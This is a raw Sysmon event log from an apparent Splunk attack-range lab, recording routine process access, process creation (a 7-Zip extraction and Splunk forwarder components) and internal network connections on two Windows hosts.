10:51:46.428{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.428{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.427{C8EA50B7-F2AD-6215-C000-000000003802}48566052C:\Windows\Explorer.EXE{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\7-Zip\7-zip.dll+545c|C:\Program Files\7-Zip\7-zip.dll+67e5|C:\Program Files\7-Zip\7-zip.dll+6fbe|C:\Program Files\7-Zip\7-zip.dll+70d9|C:\Program Files\7-Zip\7-zip.dll+8e20|C:\Program Files\7-Zip\7-zip.dll+c301|C:\Windows\System32\SHELL32.dll+80407|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+17c35c|C:\Windows\System32\SHELL32.dll+19eb28|C:\Windows\System32\SHELL32.dll+2846f3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17c600|C:\Windows\System32\SHELL32.dll+179a7e|C:\Windows\System32\SHELL32.dll+73861|C:\Windows\System32\SHELL32.dll+76746|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15 154100x8000000000000000288623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:46.425{C8EA50B7-11C2-6216-1F05-000000003802}2328C:\Program Files\7-Zip\7zG.exe21.077-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Administrator\Downloads\" -an -ai#7zMap16374:106:7zEvent15194C:\Windows\system32\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=300B8E1F636DCDE7269EF18600493819,SHA256=3AEF7662DCDBBC952A3ECD3677DA943EF3D4AECB5BD624625B6B176B1B5CE617,IMPHASH=C60649CDE63EC51599F93CD2D0157322{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 354300x8000000000000000288622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:44.495{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53489-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000288655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:47.562{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66CAA1B6704345A321837C8CA4A3ACB6,SHA256=25A614E41DB29578360446254AB14C6B7A370F9F73543A7A1E763D9C7333EB4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11C3-6216-6104-000000003902}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-11C3-6216-6104-000000003902}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11C3-6216-6104-000000003902}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.936{4F8D34B0-11C3-6216-6104-000000003902}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000216817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.629{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51353-false10.0.1.12-8000- 354300x8000000000000000216816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:45.441{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51352-false10.0.1.12-8089- 10341000x8000000000000000216815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11C3-6216-6004-000000003902}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:47.264{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 